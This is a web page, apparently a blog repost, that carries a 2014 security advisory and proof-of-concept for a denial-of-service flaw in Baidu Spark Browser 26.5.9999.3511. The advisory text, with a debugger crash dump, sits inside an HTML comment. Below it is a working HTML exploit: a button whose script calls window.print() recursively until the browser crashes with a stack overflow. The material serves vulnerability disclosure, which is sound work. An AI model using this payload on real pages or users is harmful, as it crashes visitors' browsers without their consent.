Bài liên quan
<!--Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow Vulnerability (DoS)Product web page: http://www.baidu.comAffected version: 26.5.9999.3511Summary: Spark Browser is a free Internet browser with verysharp UIs and cool utilities. It's based on the Chromiumtechnology platform, giving it fast browsing capabilities.Desc: Spark Browser version 26.5.9999.3511 allows remoteattackers to cause a denial of service (application crash)resulting in stack overflow via nested calls to the window.printjavascript function.-----------------------------------------------------------------(153c.14f4): Stack overflow - code c00000fd (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=000000b0 ebx=003d0000 ecx=003d0000 edx=5000016b esi=00000000 edi=0000010ceip=77e0decf esp=03d23000 ebp=03d230c4 iopl=0 nv up ei pl nz na po nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202ntdll!memcpy+0xbb8f:77e0decf 56 push esi-----------------------------------------------------------------Tested on: Microsoft Windows 7 Professional SP1 (EN) Microsoft Windows 7 Ultimate SP1 (EN)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscienceAdvisory ID: ZSL-2014-5190Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5190.php28.06.2014--><html><title>Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</title><body bgcolor="#50708C"><center><p><font color="#e3e3e3">Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</font></p><button onClick=crash()>Execute!</button></center><script>function crash(){ window.print(); crash();}</script></body></html>
Post a Comment